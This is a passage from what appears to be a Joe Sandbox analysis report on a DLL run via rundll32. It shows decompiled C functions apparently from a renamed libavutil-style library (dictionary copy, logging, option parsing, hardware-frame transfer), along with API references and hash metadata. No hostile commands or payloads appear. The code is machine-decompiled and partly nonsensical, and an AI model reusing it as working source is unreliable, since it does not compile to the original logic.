                                                      								_t347[0xf] = _t251;
                                                      								_t335 = _t251;
                                                      								if(_t251 == 0) {
                                                      									L19:
                                                      									 *_t347 =  &(_t347[0xf]);
                                                      									E1000A000(_t289, _t335);
                                                      									if( *(_t345 + 0xe4) > 0) {
                                                      										_t291 = 0;
                                                      										do {
                                                      											_t327 =  *(_t345 + 0xe0) + _t291 * 4;
                                                      											_t291 = _t291 + 1;
                                                      											_t337 =  *_t327;
                                                      											_t338 = _t337 + 0xc;
                                                      											 *_t347 = _t337 + 0x10;
                                                      											E1000A000(_t291, _t338);
                                                      											 *_t347 = _t338;
                                                      											L10011CC0();
                                                      											 *_t347 = _t327;
                                                      											E100265C0();
                                                      										} while (_t291 <  *(_t345 + 0xe4));
                                                      									}
                                                      									goto L22;
                                                      								} else {
                                                      									_t259 =  *(_t345 + 0xe4);
                                                      									if(_t259 > 0x1ffffffe) {
                                                      										goto L19;
                                                      									} else {
                                                      										_t347[1] = 4 + _t259 * 4;
                                                      										 *_t347 =  *(_t345 + 0xe0);
                                                      										_t262 = E10026280();
                                                      										if(_t262 == 0) {
                                                      											goto L19;
                                                      										} else {
                                                      											 *(_t345 + 0xe0) = _t262;
                                                      											 *_t347 = 0x14;
                                                      											_t263 = E100265E0();
                                                      											if(_t263 == 0) {
                                                      												goto L19;
                                                      											} else {
                                                      												_t263[4] = _t335;
                                                      												_t323 =  *(_t335 + 4);
                                                      												 *_t263 = _t326;
                                                      												_t263[2] =  *(_t335 + 8);
                                                      												_t307 =  *(_t345 + 0xe4);
                                                      												_t263[1] = _t323;
                                                      												_t347[0xb] = _t323;
                                                      												 *(_t345 + 0xe4) = _t307 + 1;
                                                      												 *( *(_t345 + 0xe0) + _t307 * 4) = _t263;
                                                      												_t340 =  *(_t289 + 4);
                                                      												_t347[7] =  *(_t289 + 8);
                                                      												_t330 = _t323;
                                                      												_t324 = _t347[0xa];
                                                      												_t347[9] = _t340;
                                                      												if(_t347[7] >= 8) {
                                                      													if((_t330 & 0x00000001) != 0) {
                                                      														_t308 =  *_t340 & 0x000000ff;
                                                      														_t330 = _t330 + 1;
                                                      														_t347[0xa] = _t308;
                                                      														 *(_t330 - 1) = _t308;
                                                      														_t347[7] = _t347[7] - 1;
                                                      														_t347[9] = _t347[9] + 1;
                                                      														if((_t330 & 0x00000002) != 0) {
                                                      															goto L34;
                                                      														}
                                                      													} else {
                                                      														if((_t330 & 0x00000002) != 0) {
                                                      															L34:
                                                      															_t342 = _t347[9];
                                                      															_t330 = _t330 + 2;
                                                      															 *((short*)(_t330 - 2)) =  *_t342 & 0x0000ffff;
                                                      															_t347[7] = _t347[7] - 2;
                                                      															_t347[9] =  &(_t342[1]);
                                                      														}
                                                      													}
                                                      													if((_t330 & 0x00000004) != 0) {
                                                      														_t341 = _t347[9];
                                                      														_t330 = _t330 + 4;
                                                      														 *(_t330 - 4) =  *_t341;
                                                      														_t347[7] = _t347[7] - 4;
                                                      														_t347[9] = _t341 + 4;
                                                      													}
                                                      												}
                                                      												_t334 = _t347[9];
                                                      												_t311 = _t347[7];
                                                      												_t264 = memcpy(_t330, _t334, _t311);
                                                      												_t347 =  &(_t347[3]);
                                                      												_t326 = _t334 + _t311 + _t311;
                                                      												goto L8;
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							} else {
                                                      								_t347[7] = _t321;
                                                      								 *_t347 =  *(_t289 + 0x10);
                                                      								_t269 = L10009FC0(_t289, _t304);
                                                      								_t343 =  *_t289;
                                                      								_t347[0xf] = _t269;
                                                      								_t332 = _t269;
                                                      								if(_t269 == 0) {
                                                      									L23:
                                                      									 *_t347 =  &(_t347[0xf]);
                                                      									E1000A000(_t289, _t343);
                                                      									if( *(_t345 + 0xe4) > 0) {
                                                      										_t344 = _t347[8];
                                                      										do {
                                                      											_t333 =  *(_t345 + 0xe0) + _t344 * 4;
                                                      											_t344 = _t344 + 1;
                                                      											_t293 =  *_t333;
                                                      											_t294 = _t293 + 0xc;
                                                      											 *_t347 = _t293 + 0x10;
                                                      											E1000A000(_t294, _t344);
                                                      											 *_t347 = _t294;
                                                      											L10011CC0();
                                                      											 *_t347 = _t333;
                                                      											E100265C0();
                                                      										} while (_t344 <  *(_t345 + 0xe4));
                                                      									}
                                                      									L22:
                                                      									 *(_t345 + 0xe4) = 0;
                                                      									 *_t347 = _t345 + 0xe0;
                                                      									E100265C0();
                                                      									return 0xfffffff4;
                                                      								} else {
                                                      									_t275 =  *(_t345 + 0xe4);
                                                      									if(_t275 > 0x1ffffffe) {
                                                      										goto L23;
                                                      									} else {
                                                      										_t347[1] = 4 + _t275 * 4;
                                                      										 *_t347 =  *(_t345 + 0xe0);
                                                      										_t278 = E10026280();
                                                      										if(_t278 == 0) {
                                                      											goto L23;
                                                      										} else {
                                                      											 *(_t345 + 0xe0) = _t278;
                                                      											 *_t347 = 0x14;
                                                      											_t264 = E100265E0();
                                                      											if(_t264 == 0) {
                                                      												goto L23;
                                                      											} else {
                                                      												 *(_t264 + 0x10) = _t332;
                                                      												_t324 = _t347[7];
                                                      												 *((intOrPtr*)(_t264 + 4)) =  *((intOrPtr*)(_t332 + 4));
                                                      												 *_t264 = _t343;
                                                      												_t334 =  *(_t345 + 0xe0);
                                                      												 *((intOrPtr*)(_t264 + 8)) =  *((intOrPtr*)(_t332 + 8));
                                                      												_t315 =  *(_t345 + 0xe4);
                                                      												_t326 = _t315 + 1;
                                                      												 *(_t345 + 0xe4) = _t315 + 1;
                                                      												 *( *(_t345 + 0xe0) + _t315 * 4) = _t264;
                                                      												L8:
                                                      												_t347[7] = _t324;
                                                      												_t347[2] = 0;
                                                      												_t304 =  *(_t289 + 0xc);
                                                      												 *_t347 = _t264 + 0xc;
                                                      												_t347[1] =  *(_t289 + 0xc);
                                                      												L10011D20();
                                                      												_t321 = _t347[7];
                                                      												goto L9;
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						} else {
                                                      							goto L9;
                                                      						}
                                                      						goto L35;
                                                      						L9:
                                                      						_t347[6] = _t347[6] + 1;
                                                      					} while ( *((intOrPtr*)(_t321 + 0xe4)) > _t347[6]);
                                                      					goto L31;
                                                      				}
                                                      				L35:
                                                      			}










































                                                      APIs
                                                      • mv_dict_copy.MAIN(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1001A89A
                                                      • mv_dict_copy.MAIN ref: 1001A996
                                                      • mv_buffer_ref.MAIN ref: 1001A9EC
                                                      • mv_realloc.MAIN ref: 1001AA26
                                                      • mv_mallocz.MAIN ref: 1001AA40
                                                      • mv_buffer_replace.MAIN(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1001AB9F
                                                      • mv_buffer_replace.MAIN(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1001ABBD
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_buffer_replacemv_dict_copy$mv_buffer_refmv_malloczmv_realloc
                                                      • String ID:
                                                      • API String ID: 1780483662-0
                                                      • Opcode ID: 07b599f6d8ee219048b6128147e910c9945fa735575f1c6576c8cbb7c6ffcc6f
                                                      • Instruction ID: 1c222d73e1748437048cd959b4fb099db9e50fe00274f25359b61923485b158e
                                                      • Opcode Fuzzy Hash: 07b599f6d8ee219048b6128147e910c9945fa735575f1c6576c8cbb7c6ffcc6f
                                                      • Instruction Fuzzy Hash: 71F1B5B49043468FC764CF29C580799BBE1FF49350F058A6EE9899B712E730E985CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 44%
                                                      			E10023730(void* __ecx, void* __eflags) {
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				signed int _t100;
                                                      				signed int _t104;
                                                      				void* _t108;
                                                      				char* _t112;
                                                      				intOrPtr _t127;
                                                      				char* _t128;
                                                      				void* _t131;
                                                      				char* _t132;
                                                      				signed int _t136;
                                                      				signed int _t138;
                                                      				void* _t139;
                                                      				signed int _t142;
                                                      				signed int _t144;
                                                      				signed int _t146;
                                                      				signed int _t148;
                                                      				signed int _t150;
                                                      				signed int _t153;
                                                      				signed int _t156;
                                                      				signed int _t159;
                                                      				signed int _t162;
                                                      				signed int _t163;
                                                      				signed int _t165;
                                                      				signed int _t167;
                                                      				void* _t168;
                                                      				signed int* _t169;
                                                      
                                                      				_t169 = _t168 - L1008ED80(0x103c);
                                                      				_t136 = _t169[0x414];
                                                      				if(_t136 == 0) {
                                                      					_t169[2] = 1;
                                                      					 *_t169 =  &(_t169[0xc]);
                                                      					_t169[1] = 0;
                                                      					E10008880(0, 0, 1, 1);
                                                      					_t169[2] = 1;
                                                      					_t162 =  &(_t169[0x20c]);
                                                      					_t169[1] = 0;
                                                      					_t159 =  &(_t169[0x30c]);
                                                      					 *_t169 =  &(_t169[0x10c]);
                                                      					E10008880(0, _t159, _t162, 1);
                                                      					_t169[1] = 0;
                                                      					_t169[2] = 1;
                                                      					 *_t169 = _t162;
                                                      					E10008880(0, _t159, _t162, 1);
                                                      					_t169[2] = 0x10000;
                                                      					_t169[1] = 0;
                                                      					 *_t169 = _t159;
                                                      					E10008880(0, _t159, _t162, 1);
                                                      					_t100 =  *(_t169[0x41a]) & 0xffffff00 |  *(_t169[0x41a]) != 0x00000000;
                                                      					L8:
                                                      					if(_t169[0x415] >= 0xfffffff9 && _t100 != 0 && ( *0x100d568c & 0x00000002) != 0) {
                                                      						_t67 = _t169[0x415] + 8; // 0x101
                                                      						_t153 = _t67;
                                                      						_t112 = 0x100b367b;
                                                      						if(_t153 <= 0x40) {
                                                      							_t112 =  *(0x100b3880 + _t153 * 4);
                                                      						}
                                                      						_t169[2] = _t112;
                                                      						_t169[1] = "[%s] ";
                                                      						 *_t169 = _t162;
                                                      						L100089C0();
                                                      					}
                                                      					 *_t169 = _t159;
                                                      					_t169[2] = _t169[0x417];
                                                      					_t169[1] = _t169[0x416];
                                                      					L10008B70();
                                                      					_t104 = _t169[0xc];
                                                      					_t142 = _t169[0x10c];
                                                      					_t163 = _t169[0x20c];
                                                      					_t138 = _t169[0x30c];
                                                      					if( *_t104 != 0 ||  *_t142 != 0 ||  *_t163 != 0) {
                                                      						L12:
                                                      						_t165 = _t169[0x30d];
                                                      						_t148 = 0;
                                                      						if(_t165 != 0 && _t169[0x30e] >= _t165) {
                                                      							_t150 =  *(_t138 + _t165 - 1) & 0x000000ff;
                                                      							_t169[0xa] = _t150 == 0xa;
                                                      							_t148 = (_t150 & 0xffffff00 | _t150 == 0x0000000d | _t169[0xa]) & 0x000000ff;
                                                      						}
                                                      						 *(_t169[0x41a]) = _t148;
                                                      						goto L16;
                                                      					} else {
                                                      						if( *_t138 == 0) {
                                                      							L16:
                                                      							_t169[3] = _t104;
                                                      							_t169[2] = "%s%s%s%s";
                                                      							_t169[6] = _t138;
                                                      							_t169[5] = _t163;
                                                      							_t169[4] = _t142;
                                                      							_t169[1] = _t169[0x419];
                                                      							 *_t169 = _t169[0x418];
                                                      							_t108 = L10022FC0();
                                                      							 *_t169 = _t159;
                                                      							_t169[1] = 0;
                                                      							_t139 = _t108;
                                                      							E10009690(_t139, _t142, _t159, _t163);
                                                      							return _t139;
                                                      						}
                                                      						goto L12;
                                                      					}
                                                      				}
                                                      				_t169[2] = 1;
                                                      				_t167 =  &(_t169[0x10c]);
                                                      				_t169[1] = 0;
                                                      				 *_t169 =  &(_t169[0xc]);
                                                      				_t162 =  &(_t169[0x20c]);
                                                      				_t169[0xa] =  *_t136;
                                                      				E10008880(_t136, 0x10000, _t162, _t167);
                                                      				_t169[2] = 1;
                                                      				_t169[1] = 0;
                                                      				 *_t169 = _t167;
                                                      				E10008880(_t136, 0x10000, _t162, _t167);
                                                      				_t169[2] = 1;
                                                      				_t169[1] = 0;
                                                      				 *_t169 = _t162;
                                                      				E10008880(_t136, 0x10000, _t162, _t167);
                                                      				_t169[2] = 0x10000;
                                                      				_t159 =  &(_t169[0x30c]);
                                                      				_t169[1] = 0;
                                                      				 *_t169 = _t159;
                                                      				E10008880(_t136, _t159, _t162, _t167);
                                                      				_t156 = _t169[0xa];
                                                      				_t144 = 0 |  *(_t169[0x41a]) != 0x00000000;
                                                      				_t100 = _t144;
                                                      				if(_t156 != 0 && _t144 != 0) {
                                                      					_t127 =  *((intOrPtr*)(_t156 + 0x14));
                                                      					if(_t127 != 0) {
                                                      						_t146 =  *(_t136 + _t127);
                                                      						if(_t146 != 0) {
                                                      							_t131 =  *_t146;
                                                      							if(_t131 != 0) {
                                                      								 *_t169 = _t146;
                                                      								_t169[0xb] = _t156;
                                                      								_t169[0xa] = _t146;
                                                      								_t132 =  *((intOrPtr*)(_t131 + 4))();
                                                      								_t169[3] = _t169[0xa];
                                                      								_t169[2] = _t132;
                                                      								_t169[1] = "[%s @ %p] ";
                                                      								 *_t169 =  &(_t169[0xc]);
                                                      								L100089C0();
                                                      								_t156 = _t169[0xb];
                                                      							}
                                                      						}
                                                      					}
                                                      					 *_t169 = _t136;
                                                      					_t128 =  *((intOrPtr*)(_t156 + 4))();
                                                      					_t169[3] = _t136;
                                                      					_t169[1] = "[%s @ %p] ";
                                                      					 *_t169 = _t167;
                                                      					_t169[2] = _t128;
                                                      					L100089C0();
                                                      					_t100 = _t169[0x41a] & 0xffffff00 |  *(_t169[0x41a]) != 0x00000000;
                                                      				}
                                                      			}

































                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_bprint_init$mv_bprintf$mv_bprint_finalizemv_vbprintf
                                                      • String ID: %s%s%s%s$[%s @ %p] $[%s]
                                                      • API String ID: 2514531573-1798253436
                                                      • Opcode ID: 73ec329c920999803a4babe89b4941ef9f254048450b1a5a3304028e830a3db2
                                                      • Instruction ID: 6f949b97a94191d98c9e239c908f2f64f0d76179adbd4d945766b856959e5812
                                                      • Opcode Fuzzy Hash: 73ec329c920999803a4babe89b4941ef9f254048450b1a5a3304028e830a3db2
                                                      • Instruction Fuzzy Hash: 5F8106B49097809FD354DF28D08069BBBE5FF89380F95C92EF8C88B315DA749984CB42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      • Missing key or no key/value separator found after key '%s', xrefs: 1002D3B4
                                                      • Setting entry with key '%s' to value '%s', xrefs: 1002D2CC
                                                      • Key '%s' not found., xrefs: 1002D364
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_logstrspn$mv_get_token$mv_freepmv_mallocmv_opt_setstrlen
                                                      • String ID: Key '%s' not found.$Missing key or no key/value separator found after key '%s'$Setting entry with key '%s' to value '%s'
                                                      • API String ID: 3679258194-2858522012
                                                      • Opcode ID: 595c6547f65cc4bb8e71bd801e19b34be3a319f29eb8b0681d307362fd9c2fa6
                                                      • Instruction ID: 7fb14f7b88a9286a04fbc63168e79df0a13211f554c8c21c667f0136fc5f52d7
                                                      • Opcode Fuzzy Hash: 595c6547f65cc4bb8e71bd801e19b34be3a319f29eb8b0681d307362fd9c2fa6
                                                      • Instruction Fuzzy Hash: 5B41D2B4A097409FC340EF29E48061EBBE4FF88394F91892EF5C887351EA75D940CB82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • mv_log.MAIN ref: 1002D46B
                                                      • mv_opt_set.MAIN ref: 1002D488
                                                      • mv_opt_get_key_value.MAIN ref: 1002D4F6
                                                        • Part of subcall function 1002BF30: strspn.MSVCRT ref: 1002BF4D
                                                        • Part of subcall function 1002BF30: strspn.MSVCRT ref: 1002BF97
                                                        • Part of subcall function 1002BF30: strchr.MSVCRT ref: 1002BFB5
                                                        • Part of subcall function 1002BF30: mv_malloc.MAIN(?,?,?,?,?,?,?,?,?,?,100AEACF,100AEB86,00000000,?,1000DF13), ref: 1002BFCD
                                                        • Part of subcall function 1002BF30: mv_get_token.MAIN ref: 1002BFFF
                                                      • mv_strerror.MAIN ref: 1002D5A9
                                                      • mv_log.MAIN ref: 1002D5D2
                                                      • mv_log.MAIN ref: 1002D615
                                                      • mv_log.MAIN ref: 1002D653
                                                      Strings
                                                      • Unable to parse '%s': %s, xrefs: 1002D5AE
                                                      • Option '%s' not found, xrefs: 1002D637
                                                      • Setting '%s' to value '%s', xrefs: 1002D44C
                                                      • No option name near '%s', xrefs: 1002D600
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_log$strspn$mv_get_tokenmv_mallocmv_opt_get_key_valuemv_opt_setmv_strerrorstrchr
                                                      • String ID: No option name near '%s'$Option '%s' not found$Setting '%s' to value '%s'$Unable to parse '%s': %s
                                                      • API String ID: 669169455-2003673103
                                                      • Opcode ID: 42f4af90029895782656a055397532cb0e26e144a9066ca91bb51c1471e1f9dd
                                                      • Instruction ID: 701acf41a1ead03db3666d664b3341f8442fad518a1ed00e3a98405c4d1a9712
                                                      • Opcode Fuzzy Hash: 42f4af90029895782656a055397532cb0e26e144a9066ca91bb51c1471e1f9dd
                                                      • Instruction Fuzzy Hash: 5C51F575A087509FD760EF29E48075EBBE4EFC4654F91882EE9C9C7341E774E8408B82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_tree_find
                                                      • String ID:
                                                      • API String ID: 59044961-0
                                                      • Opcode ID: a2a5cd09734139798f1fd845032fbc4d271d5e899faa0ed1a3b262cc80cb7db8
                                                      • Instruction ID: cce57886af535d8735bdf396c26f78100a8d8e3b141664cbd45599b0a5c3ab2e
                                                      • Opcode Fuzzy Hash: a2a5cd09734139798f1fd845032fbc4d271d5e899faa0ed1a3b262cc80cb7db8
                                                      • Instruction Fuzzy Hash: 4FF1AFB490974A9FC344DF2AC18091AFBE5FFC8654F61892EE888D7311E774E9418F86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_tree_find
                                                      • String ID:
                                                      • API String ID: 59044961-0
                                                      • Opcode ID: 2e39002f0947aa2d0dcfdfe7d57795e1a31c696425fd7e0b4506f071d05121fc
                                                      • Instruction ID: 7ec3c2c7dacb140ed4bfedfc7a75d038d4e13e51791f240047a25a975b8cf788
                                                      • Opcode Fuzzy Hash: 2e39002f0947aa2d0dcfdfe7d57795e1a31c696425fd7e0b4506f071d05121fc
                                                      • Instruction Fuzzy Hash: 73F1A0B490974A9FC344DF2AC18081AFBE5FFC8654F61892EE898D7311E774E9418F86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 28%
                                                      			E1001E0B0(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi) {
                                                      				signed int _t213;
                                                      				signed int _t214;
                                                      				intOrPtr _t215;
                                                      				signed int _t219;
                                                      				signed int _t220;
                                                      				signed int _t221;
                                                      				signed int _t224;
                                                      				signed int _t227;
                                                      				signed int _t228;
                                                      				signed int _t230;
                                                      				signed int _t247;
                                                      				signed int _t253;
                                                      				signed int _t254;
                                                      				signed int _t255;
                                                      				signed int _t257;
                                                      				void* _t258;
                                                      				void* _t259;
                                                      				signed int _t261;
                                                      				void* _t262;
                                                      				void* _t263;
                                                      				signed char _t267;
                                                      				signed int _t268;
                                                      				signed int _t269;
                                                      				signed int _t273;
                                                      				intOrPtr _t275;
                                                      				intOrPtr _t280;
                                                      				signed int _t281;
                                                      				signed int _t282;
                                                      				signed int _t283;
                                                      				intOrPtr _t289;
                                                      				signed int _t291;
                                                      				signed int _t297;
                                                      				signed int _t300;
                                                      				signed int _t302;
                                                      				signed int _t304;
                                                      				signed short* _t309;
                                                      				signed short* _t310;
                                                      				int _t314;
                                                      				signed int _t324;
                                                      				intOrPtr* _t326;
                                                      				intOrPtr _t327;
                                                      				signed char _t335;
                                                      				short* _t336;
                                                      				signed char _t337;
                                                      				short* _t338;
                                                      				signed int _t339;
                                                      				signed int _t341;
                                                      				char* _t343;
                                                      				signed int _t345;
                                                      				signed int _t347;
                                                      				signed int _t349;
                                                      				signed int _t352;
                                                      				void* _t353;
                                                      				void* _t356;
                                                      				signed int _t362;
                                                      				signed int _t364;
                                                      				signed int _t368;
                                                      				signed int _t370;
                                                      				signed int _t373;
                                                      				signed short* _t374;
                                                      				signed short* _t375;
                                                      				signed int _t376;
                                                      				void* _t378;
                                                      				signed int _t381;
                                                      				intOrPtr _t382;
                                                      				signed int _t383;
                                                      				signed int _t385;
                                                      				signed int _t388;
                                                      				void* _t389;
                                                      				intOrPtr* _t390;
                                                      				signed int* _t392;
                                                      				signed int* _t396;
                                                      
                                                      				_t390 = _t389 - 0x4c;
                                                      				 *((intOrPtr*)(_t390 + 0x44)) = __edi;
                                                      				 *((intOrPtr*)(_t390 + 0x3c)) = __ebx;
                                                      				_t343 =  *(_t390 + 0x54);
                                                      				 *((intOrPtr*)(_t390 + 0x48)) = _t382;
                                                      				_t289 =  *((intOrPtr*)(_t390 + 0x50));
                                                      				 *((intOrPtr*)(_t390 + 0x40)) = __esi;
                                                      				 *(_t390 + 0x28) =  *(_t390 + 0x58);
                                                      				_t383 =  *(_t289 + 0x50);
                                                      				_t362 =  *(_t289 + 0x128);
                                                      				 *(_t390 + 0x24) = _t383;
                                                      				if(_t343[0x128] == 0) {
                                                      					_t213 = _t362;
                                                      					goto L83;
                                                      				} else {
                                                      					__eflags = __esi;
                                                      					__edx =  *(__eax + 4);
                                                      					if(__esi == 0) {
                                                      						__eax = __edi[0x50];
                                                      						__eflags =  *((intOrPtr*)(__edx + 0x24)) - __edi[0x50];
                                                      						if( *((intOrPtr*)(__edx + 0x24)) != __edi[0x50]) {
                                                      							goto L91;
                                                      						} else {
                                                      							 *(__edx + 4) =  *( *(__edx + 4));
                                                      							__eax =  *( *( *(__edx + 4)) + 0x50);
                                                      							__eflags = __eax;
                                                      							if(__eax == 0) {
                                                      								goto L91;
                                                      							} else {
                                                      								goto L79;
                                                      							}
                                                      						}
                                                      					} else {
                                                      						__eax =  *(__esi + 4);
                                                      						__eflags = __eax - __edx;
                                                      						if(__eax == __edx) {
                                                      							__ecx =  *(__eax + 0x28);
                                                      							__eflags = __edi[0x50] -  *(__eax + 0x28);
                                                      							if(__edi[0x50] !=  *(__eax + 0x28)) {
                                                      								goto L66;
                                                      							} else {
                                                      								__eflags =  *((intOrPtr*)(__eax + 0x24)) - __ebp;
                                                      								if( *((intOrPtr*)(__eax + 0x24)) != __ebp) {
                                                      									goto L66;
                                                      								} else {
                                                      									goto L89;
                                                      								}
                                                      							}
                                                      						} else {
                                                      							L66:
                                                      							__ecx =  *(__edx + 4);
                                                      							__esp[0xb] = __ecx;
                                                      							__ecx = __ecx[0xc];
                                                      							__eflags = __ecx;
                                                      							if(__ecx == 0) {
                                                      								L68:
                                                      								__ecx = __edi[0x50];
                                                      								__eflags =  *((intOrPtr*)(__edx + 0x24)) - __edi[0x50];
                                                      								if( *((intOrPtr*)(__edx + 0x24)) == __edi[0x50]) {
                                                      									__esp[0xb] =  *(__esp[0xb]);
                                                      									__eax =  *( *(__esp[0xb]) + 0x50);
                                                      									__eflags = __eax;
                                                      									if(__eax != 0) {
                                                      										L79:
                                                      										__esp[2] = __edi;
                                                      										__ecx = __esp[0xa];
                                                      										__esp[1] = __ebx;
                                                      										 *__esp = __edx;
                                                      										__esp[3] = __esp[0xa];
                                                      										__eax =  *__eax();
                                                      										__eflags = __eax;
                                                      										if(__eax >= 0) {
                                                      											goto L76;
                                                      										} else {
                                                      											__eflags = __eax - 0xffffffd8;
                                                      											if(__eax != 0xffffffd8) {
                                                      												goto L73;
                                                      											} else {
                                                      												__eax =  *(__ebx + 0x128);
                                                      												L83:
                                                      												__eflags = _t213;
                                                      												if(_t213 == 0) {
                                                      													goto L91;
                                                      												} else {
                                                      													 *(_t390 + 0x24) =  *(_t289 + 0x50);
                                                      													goto L85;
                                                      												}
                                                      											}
                                                      										}
                                                      									} else {
                                                      										__eax = __esi;
                                                      										L85:
                                                      										_t215 =  *((intOrPtr*)(_t213 + 4));
                                                      										goto L69;
                                                      									}
                                                      								} else {
                                                      									L69:
                                                      									__eflags =  *((intOrPtr*)(_t215 + 0x24)) -  *(_t390 + 0x24);
                                                      									if( *((intOrPtr*)(_t215 + 0x24)) !=  *(_t390 + 0x24)) {
                                                      										L91:
                                                      										_t214 = 0xffffffd8;
                                                      										goto L76;
                                                      									} else {
                                                      										_t324 =  *( *((intOrPtr*)( *((intOrPtr*)(_t215 + 4)))) + 0x4c);
                                                      										__eflags = _t324;
                                                      										if(_t324 == 0) {
                                                      											goto L91;
                                                      										} else {
                                                      											 *(_t390 + 8) = _t343;
                                                      											 *((intOrPtr*)(_t390 + 4)) = _t289;
                                                      											 *_t390 = _t215;
                                                      											 *(_t390 + 0xc) =  *(_t390 + 0x28);
                                                      											_t214 =  *_t324();
                                                      											__eflags = _t214;
                                                      											if(_t214 >= 0) {
                                                      												goto L76;
                                                      											} else {
                                                      												__eflags = _t214 - 0xffffffd8;
                                                      												if(_t214 == 0xffffffd8) {
                                                      													goto L91;
                                                      												} else {
                                                      													L73:
                                                      													__eflags = _t362;
                                                      													if(_t362 == 0) {
                                                      														L75:
                                                      														 *(_t390 + 0x24) = _t214;
                                                      														__eflags = 0;
                                                      														 *(_t289 + 0x128) = 0;
                                                      														 *_t390 = _t289;
                                                      														E1001B300();
                                                      														_t214 =  *(_t390 + 0x24);
                                                      														 *(_t289 + 0x128) = _t362;
                                                      														 *(_t289 + 0x50) = _t383;
                                                      														goto L76;
                                                      													} else {
                                                      														__eflags =  *(_t289 + 0x128) - _t362;
                                                      														if( *(_t289 + 0x128) != _t362) {
                                                      															 *((intOrPtr*)(_t390 + 0x14)) = 0x358;
                                                      															__eflags = 0;
                                                      															 *((intOrPtr*)(_t390 + 4)) = 0;
                                                      															 *_t390 = 0;
                                                      															 *(_t390 + 0x10) = "libavutil/hwcontext.c";
                                                      															 *(_t390 + 0xc) = "orig_dst_frames == ((void *)0) || orig_dst_frames == dst->hw_frames_ctx";
                                                      															 *(_t390 + 8) = "Assertion %s failed at %s:%d\n";
                                                      															L10023A40();
                                                      															abort();
                                                      															_push(_t362);
                                                      															_push(_t289);
                                                      															_t392 = _t390 - 0x34;
                                                      															_t219 = _t392[0x10];
                                                      															_t291 = _t392[0x11];
                                                      															_t364 =  *(_t219 + 4);
                                                      															_t326 =  *((intOrPtr*)(_t364 + 4));
                                                      															_t306 =  *(_t326 + 0xc);
                                                      															__eflags =  *(_t326 + 0xc);
                                                      															if( *(_t326 + 0xc) == 0) {
                                                      																_t327 =  *_t326;
                                                      																_t307 =  *(_t327 + 0x3c);
                                                      																__eflags =  *(_t327 + 0x3c);
